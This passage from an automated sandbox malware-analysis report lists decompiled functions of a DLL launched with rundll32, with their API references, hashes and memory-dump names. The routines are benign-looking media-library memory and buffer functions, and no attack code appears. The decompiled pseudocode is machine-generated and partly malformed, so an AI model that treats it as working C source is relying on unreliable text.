0x1001e5f9
0x1001e5fc
0x1001e5fc
0x00000000
0x1001e5f3
0x1001e580
0x1001e584
0x1001e589
0x1001e592
0x1001e594
0x1001e598
0x1001e59d
0x00000000
0x00000000
0x1001e59f
0x1001e5a3
0x1001e5a5
0x1001e5a9
0x00000000
0x1001e5a9
0x1001e603
0x1001e607
0x1001e609
0x1001e60d
0x1001e612
0x00000000
0x00000000
0x1001e614
0x1001e61b
0x00000000

APIs

mv_hwframe_get_buffer.MAIN ref: 1001E561

Part of subcall function 1001E2F0: mv_buffer_ref.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E317
Part of subcall function 1001E2F0: mv_frame_alloc.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E32A
Part of subcall function 1001E2F0: mv_hwframe_map.MAIN(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E36C
Part of subcall function 1001E2F0: mv_log.MAIN ref: 1001E396
Part of subcall function 1001E2F0: mv_frame_free.MAIN ref: 1001E3A2

mv_frame_alloc.MAIN ref: 1001E584

Part of subcall function 1001AC40: mv_malloc.MAIN ref: 1001AC56

mv_frame_free.MAIN ref: 1001E5CB
mv_freep.MAIN ref: 1001E5DC
mv_freep.MAIN ref: 1001E61B
mv_freep.MAIN ref: 1001E63A

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_frame_allocmv_frame_free$mv_buffer_refmv_hwframe_get_buffermv_hwframe_mapmv_logmv_malloc
String ID:
API String ID: 2206481229-0
Opcode ID: 25283562a18f3cc925092daff3d8813b508f0ce4e67f46393089d96786ff75ef
Instruction ID: ca945ac18ed839ac5bf74ac2fa747fd2f81b9f58e27d0342db77472b587ece54
Opcode Fuzzy Hash: 25283562a18f3cc925092daff3d8813b508f0ce4e67f46393089d96786ff75ef
Instruction Fuzzy Hash: F42126756087518FD340DF29C880A4EF3E5FF89354F468869E988DB321E770EC858B41

Uniqueness

Uniqueness Score: -1.00%

Function 100027B0 Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100027B0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				void* _t27;
				intOrPtr _t28;
				void* _t33;
				void* _t34;
				void* _t36;
				intOrPtr _t38;
				void* _t39;
				signed int _t40;
				intOrPtr* _t41;
				intOrPtr* _t42;

				_t36 = __edx;
				_t41 =  *((intOrPtr*)(_t42 + 0x50));
				_t38 =  *((intOrPtr*)(_t42 + 0x54));
				 *_t42 =  *((intOrPtr*)( *_t41));
				_t39 = L10017F10();
				 *_t42 =  *((intOrPtr*)( *_t41));
				_t23 = L10017F40();
				 *((intOrPtr*)(_t42 + 0x10)) = 1;
				_t33 = _t23;
				 *((intOrPtr*)(_t42 + 8)) = _t38;
				 *((intOrPtr*)(_t42 + 0xc)) =  *((intOrPtr*)(_t41 + 0x14));
				 *((intOrPtr*)(_t42 + 4)) =  *((intOrPtr*)(_t41 + 0x10));
				 *_t42 = _t42 + 0x2c;
				_t27 = E1003A070(_t33, _t36, _t38, _t39);
				if(_t27 >= 0) {
					_t28 =  *((intOrPtr*)(_t42 + 0x2c));
					_t34 = _t33 + _t39;
					if(_t34 >= _t28 ||  *((intOrPtr*)(_t41 + 4)) <= 0) {
						L7:
						 *((intOrPtr*)(_t41 + 0xc)) = _t38;
						return 0;
					}
					_t40 = 0;
					while(1) {
						 *((intOrPtr*)(_t42 + 4)) = _t28 - _t34;
						 *_t42 =  *((intOrPtr*)( *_t41 + _t40 * 4));
						_t27 = L10017F70(_t34, _t38, _t40, _t41);
						if(_t27 < 0) {
							goto L8;
						}
						_t40 = _t40 + 1;
						if( *((intOrPtr*)(_t41 + 4)) > _t40) {
							_t28 =  *((intOrPtr*)(_t42 + 0x2c));
							continue;
						} else {
							goto L7;
						}
						goto L8;
					}
				}
				L8:
				return _t27;
			}

0x100027b0
0x100027b7
0x100027bb
0x100027c4
0x100027cc
0x100027d3
0x100027d6
0x100027e0
0x100027e4
0x100027e9
0x100027ed
0x100027f4
0x100027fc
0x100027ff
0x10002806
0x10002808
0x1000280c
0x10002810
0x10002842
0x10002842
0x00000000
0x10002845
0x10002819
0x10002824
0x10002826
0x10002830
0x10002833
0x1000283a
0x00000000
0x00000000
0x1000283c
0x10002840
0x10002820
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10002840
0x10002824
0x1000284e
0x1000284e

APIs

mv_fifo_can_read.MAIN ref: 100027C7
mv_fifo_can_write.MAIN ref: 100027D6
mv_samples_get_buffer_size.MAIN ref: 100027FF
mv_fifo_grow2.MAIN ref: 10002833

Part of subcall function 10017F70: mv_realloc_array.MAIN(?,?,?,?,?,?,?,?,?,?,?,?,?,?,10002838), ref: 10017FAE

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_fifo_can_readmv_fifo_can_writemv_fifo_grow2mv_realloc_arraymv_samples_get_buffer_size
String ID:
API String ID: 78108474-0
Opcode ID: 0ae8dcb50c524f4d83e5332cc30a05b3d9202b551eefed4852725224eaea7f23
Instruction ID: aca124555f9e986d8ecf7dcc78e3baf80687684f5b36e82da0df567b59823915
Opcode Fuzzy Hash: 0ae8dcb50c524f4d83e5332cc30a05b3d9202b551eefed4852725224eaea7f23
Instruction Fuzzy Hash: 8611E378A093559FD700DF69C58094ABBE4FF88394F01892DFD88CB314E774E9458B92

Uniqueness

Uniqueness Score: -1.00%

Function 100A1390 Relevance: 6.1, APIs: 4, Instructions: 53synchronizationCOMMON

Download Yara Rule

APIs

GetTickCount64.KERNEL32 ref: 100A13AD
GetTickCount64.KERNEL32 ref: 100A13C0
WaitForSingleObject.KERNEL32 ref: 100A13D7
WaitForSingleObject.KERNEL32 ref: 100A1403

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Count64ObjectSingleTickWait
String ID:
API String ID: 3187275320-0
Opcode ID: 1cfadcc898e6b36cfd1a4f7bf5837ebdbe6212e429eb6220fca006c3ac279431
Instruction ID: 1bf18b280d2744a8743e55954746d7a5a9d8936b65fabab63a36412c31ae482f
Opcode Fuzzy Hash: 1cfadcc898e6b36cfd1a4f7bf5837ebdbe6212e429eb6220fca006c3ac279431
Instruction Fuzzy Hash: 1201BC32B092548BC700BEBD9CC845EBBE5FBC41A4F808A3DE988C7705E63098088792

Uniqueness

Uniqueness Score: -1.00%

Function 1001B7E0 Relevance: 6.0, APIs: 4, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E1001B7E0(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				intOrPtr _v40;
				void* __ebx;
				void* __esi;
				char _t24;
				signed int _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				intOrPtr _t33;
				signed int _t40;
				intOrPtr _t42;
				void* _t43;
				intOrPtr* _t44;

				_t44 = _t43 - 0x24;
				_t42 = _a4;
				 *_t44 = _a12;
				_t24 = L10009DC0(_t33, __ecx, __edi, _t42);
				_v16 = _t24;
				if(_t24 == 0) {
					L5:
					 *_t44 =  &_v16;
					E1000A000(_t33, _t42);
					return 0;
				} else {
					_t33 = _t24;
					_t28 =  *(_t42 + 0xe4);
					if(_t28 > 0x1ffffffe) {
						goto L5;
					} else {
						_v40 = 4 + _t28 * 4;
						 *_t44 =  *((intOrPtr*)(_t42 + 0xe0));
						_t31 = E10026280();
						if(_t31 == 0) {
							goto L5;
						} else {
							 *((intOrPtr*)(_t42 + 0xe0)) = _t31;
							 *_t44 = 0x14;
							_t32 = E100265E0();
							if(_t32 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t32 + 0x10)) = _t33;
								 *((intOrPtr*)(_t32 + 4)) =  *((intOrPtr*)(_t33 + 4));
								 *((intOrPtr*)(_t32 + 8)) =  *((intOrPtr*)(_t33 + 8));
								 *_t32 = _a8;
								_t40 =  *(_t42 + 0xe4);
								 *(_t42 + 0xe4) = _t40 + 1;
								 *((intOrPtr*)( *((intOrPtr*)(_t42 + 0xe0)) + _t40 * 4)) = _t32;
								return _t32;
							}
						}
					}
				}
			}

0x1001b7e2
0x1001b7e9
0x1001b7ed
0x1001b7f0
0x1001b7f5
0x1001b7fb
0x1001b878
0x1001b87c
0x1001b87f
0x1001b88b
0x1001b7fd
0x1001b7fd
0x1001b7ff
0x1001b80a
0x00000000
0x1001b80c
0x1001b813
0x1001b81d
0x1001b820
0x1001b827
0x00000000
0x1001b829
0x1001b829
0x1001b82f
0x1001b836
0x1001b83d
0x00000000
0x1001b83f
0x1001b83f
0x1001b84b
0x1001b851
0x1001b858
0x1001b85a
0x1001b863
0x1001b869
0x1001b871
0x1001b871
0x1001b83d
0x1001b827
0x1001b80a

APIs

mv_buffer_alloc.MAIN(?,?,?,?,?,?,?,?,1001284A), ref: 1001B7F0

Part of subcall function 10009DC0: mv_malloc.MAIN ref: 10009DDC
Part of subcall function 10009DC0: mv_mallocz.MAIN ref: 10009DF2
Part of subcall function 10009DC0: mv_mallocz.MAIN ref: 10009E25

mv_realloc.MAIN(?,?,?,?,?,?,?,?,1001284A), ref: 1001B820

Part of subcall function 10026280: _aligned_realloc.MSVCRT ref: 100262AB

mv_mallocz.MAIN(?,?,?,?,?,?,?,?,1001284A), ref: 1001B836
mv_buffer_unref.MAIN(?,?,?,?,?,?,?,?,1001284A), ref: 1001B87F

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$_aligned_reallocmv_buffer_allocmv_buffer_unrefmv_mallocmv_realloc
String ID:
API String ID: 547404713-0
Opcode ID: f53c243b31966ade95df7518ce4c0598c2817321e792378a526fbf3cdf0bd58c
Instruction ID: e87e4f9eabebad2ec55774af977a150987189923fc92643a84a7bc33fe8d3c27
Opcode Fuzzy Hash: f53c243b31966ade95df7518ce4c0598c2817321e792378a526fbf3cdf0bd58c
Instruction Fuzzy Hash: 0011F8B4908B418FD750DF25D48068AFBE4FF48290F55896EE99A9B315EB30E881CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10007050 Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E10007050(intOrPtr __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v1028;
				intOrPtr _v1032;
				char _v1036;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _t29;
				char* _t32;
				intOrPtr* _t39;

				_t37 = __esi;
				_t36 = __edi;
				_v4 = __ebx;
				_t32 =  &_v1036;
				_v1060 = 0x7fffffff;
				_v1064 = 1;
				 *_t39 = _t32;
				E10008880(_t32, __edi, __esi, __ebp);
				 *_t39 = _t32;
				_v1052 = _a20;
				_v1056 = _a16;
				_v1060 = _a12;
				_v1064 = _a8;
				E10009730();
				if(_v1032 >= _v1028) {
					 *_t39 = _t32;
					_v1064 = 0;
					E10009690(_t32, 1, _t36, _t37);
					_t29 = 0xfffffff4;
				} else {
					 *_t39 = _t32;
					_v1064 = _a4;
					_t29 = E10009690(_t32, 1, _t36, _t37);
					if(_t29 >= 0) {
						_t29 = _v1032;
					}
				}
				return _t29;
			}

0x10007050
0x10007050
0x1000705b
0x10007062
0x1000706b
0x1000706f
0x10007073
0x10007076
0x10007082
0x10007085
0x10007090
0x1000709b
0x100070a6
0x100070aa
0x100070b7
0x100070e8
0x100070ed
0x100070f1
0x100070f6
0x100070b9
0x100070b9
0x100070c3
0x100070c7
0x100070ce
0x100070d0
0x100070d0
0x100070ce
0x100070e1

APIs

mv_bprint_init.MAIN ref: 10007076
mv_bprint_escape.MAIN ref: 100070AA

Part of subcall function 10009730: mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB

mv_bprint_finalize.MAIN ref: 100070C7

Part of subcall function 10009690: mv_realloc.MAIN(?,?,?,?,?,?,10006D57), ref: 100096C9

mv_bprint_finalize.MAIN ref: 100070F1

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_finalize$mv_bprint_escapemv_bprint_initmv_bprintfmv_realloc
String ID:
API String ID: 2707718180-0
Opcode ID: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
Instruction ID: 7786e306f37471b19b8e033861bf3e046f7241f8be26b7eb16500715b45264db
Opcode Fuzzy Hash: 8fcf3987ad7d05698dc9ea44ca5edbe39d28e2b760c260b832d1773102fd6b80
Instruction Fuzzy Hash: 9F116DB4A093408BD360DF28C18065EBBE0BF88254F908E2DBA9C87345E635A944CB06

Uniqueness

Uniqueness Score: -1.00%

Function 1001140B Relevance: 6.0, APIs: 4, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001140B(void* __ebx, void* __esi, intOrPtr _a40, intOrPtr _a44, void* _a60, void* _a64, void* _a68, void* _a72, intOrPtr _a80) {
				intOrPtr* _t17;

				E100265C0(__ebx);
				E100265C0(_a80);
				 *_t17 = _a40;
				L100265B0();
				 *_t17 = _a44;
				L100265B0();
				return __esi;
			}

0x10011416
0x10011422
0x100112a2
0x100112a5
0x100112ae
0x100112b1
0x100112cb

APIs

mv_freep.MAIN ref: 10011416
mv_freep.MAIN ref: 10011422

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep
String ID:
API String ID: 2373662943-0
Opcode ID: 7d849d430b18bd63c2ffebc00fb6b84f710c2797a3bf5240d0040ef1fb02228c
Instruction ID: e6160234d2b5473e354702e54758fc74ece171a8690405ef2f617578e500f202
Opcode Fuzzy Hash: 7d849d430b18bd63c2ffebc00fb6b84f710c2797a3bf5240d0040ef1fb02228c
Instruction Fuzzy Hash: B3E0AE79508B608BC700EF28D88141EB7F0FF89208F854C1DFAC4A7306E635F9448B82

Uniqueness

Uniqueness Score: -1.00%

Function 1001F870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

Assertion %s failed at %s:%d, xrefs: 1001F99A

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_get_cpu_flags
String ID: Assertion %s failed at %s:%d
API String ID: 185405932-2766368343
Opcode ID: 7551bec9f1eeb9b50cbb3d7bd5363e3c1abd8a109e782f2c9d38e8ffc4970d7f
Instruction ID: 4f99d49389e0e95857478378ad07d1c4ddbe0ca0cbe19b611fff2a9fa084b9f8
Opcode Fuzzy Hash: 7551bec9f1eeb9b50cbb3d7bd5363e3c1abd8a109e782f2c9d38e8ffc4970d7f
Instruction Fuzzy Hash: 27410575A083419FC700DF58C18162EFBF1FF95740F91892DE9895B311D7B6EA858B42

Uniqueness

Uniqueness Score: -1.00%

Function 1001F6A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

mv_image_get_linesize.MAIN ref: 1001F6E3

Part of subcall function 1001E960: mv_pix_fmt_desc_get.MAIN(?,?,?,?,?,?,?,?,?,?,00000000,?,100B3560,00000000,1001F6E8), ref: 1001E976

Strings

Picture size %ux%u is invalid, xrefs: 1001F76D

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_image_get_linesizemv_pix_fmt_desc_get
String ID: Picture size %ux%u is invalid
API String ID: 645864070-1963597007
Opcode ID: bffdba0522676a7119fbd8fb8b2c8a2483aa10af2a0b965411779b3daaf4d02a
Instruction ID: 48c45da9e3d96b5e90a1d1455c756ac50fe1bc564d21c4e887ebdd33d9096bef
Opcode Fuzzy Hash: bffdba0522676a7119fbd8fb8b2c8a2483aa10af2a0b965411779b3daaf4d02a
Instruction Fuzzy Hash: 51213D75A083558FC304CF69C08021EFBE1FBC8710F658A2EF99897390EBB1E9458B46

Uniqueness

Uniqueness Score: -1.00%

Function 1002E160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 1002E173
mv_parse_video_size.MAIN ref: 1002E203

Strings

none, xrefs: 1002E16A

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_parse_video_sizestrcmp
String ID: none
API String ID: 3218284479-2140143823
Opcode ID: 84f624393dde609fecd91fcb81b813e84baa12488068a8de4cf90aaac65596b6
Instruction ID: 729e6b95738b9364faedc3518f6085fbd91f0b578ed6da749226210f4fcd2ad2
Opcode Fuzzy Hash: 84f624393dde609fecd91fcb81b813e84baa12488068a8de4cf90aaac65596b6
Instruction Fuzzy Hash: C501AF756493819BC780DF28E58141ABBE0EF88780FD58C3EB999C7611E734ED50DB52

Uniqueness

Uniqueness Score: -1.00%

Function 1000C461 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.MAIN ref: 1000C4A8
mv_bprintf.MAIN ref: 1000C4D0

Strings

none, xrefs: 1000C4C7

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: none
API String ID: 2490314137-2140143823
Opcode ID: 44bfa67158831aa083f8cc1da789653ca32cdf6bd98319aefa498c906f6f28ff
Instruction ID: ef26fa46dfb025d24f9aeb391b3245028a50c27fa559dbd60d9f836e91f94d6c
Opcode Fuzzy Hash: 44bfa67158831aa083f8cc1da789653ca32cdf6bd98319aefa498c906f6f28ff
Instruction Fuzzy Hash: E60136B5904B568BD720DF24D880B9BB3E4FFC4394F52492DEA9853245D330BD858B97

Uniqueness

Uniqueness Score: -1.00%

Function 1002B099 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E1002B099(void* __ebx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a64, void* _a204, void* _a208, void* _a212, void* _a216) {
				void* _t9;
				void* _t10;
				intOrPtr _t11;
				intOrPtr* _t14;
				intOrPtr _t16;
				void* _t18;
				intOrPtr* _t20;

				_t14 = __edi;
				__eax =  *__ebx;
				__eax = L10031930( *__ebx);
				__eax =  ==  ? 0x100b3bdc : __eax;
				_a12 = __eax;
				__esi =  &_a64;
				__eax = 0x100b3e26;
				_a8 = 0x100b3e26;
				__eax = 0x80;
				_a4 = 0x80;
				 *__esp = __esi;
				__eax = E10028560();
				if(_t9 > 0x7f) {
					_t10 = 0xffffffea;
				} else {
					 *_t20 = _t16;
					_t11 = E100267C0(__ebx, __edi, _t16, _t18);
					 *_t14 = _t11;
					if(_t11 == 0) {
						_t10 = 0xfffffff4;
					} else {
						_t10 = 0;
					}
				}
				return _t10;
			}

0x1002b099
0x1002b0a0
0x1002b0a5
0x1002b091
0x1002afb7
0x1002afbb
0x1002afbf
0x1002afc4
0x1002afc8
0x1002afcd
0x1002afd1
0x1002afd4
0x1002ae53
0x1002b1f0
0x1002ae59
0x1002ae59
0x1002ae5c
0x1002ae61
0x1002ae65
0x1002b1e2
0x1002ae6b
0x1002ae6b
0x1002ae6b
0x1002ae65
0x1002ae8f

APIs

mv_strdup.MAIN ref: 1002AE5C

Part of subcall function 100267C0: strlen.MSVCRT ref: 100267DE
Part of subcall function 100267C0: _aligned_realloc.MSVCRT ref: 10026805

mv_get_pix_fmt_name.MAIN ref: 1002B0A5

Strings

none, xrefs: 1002B08C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
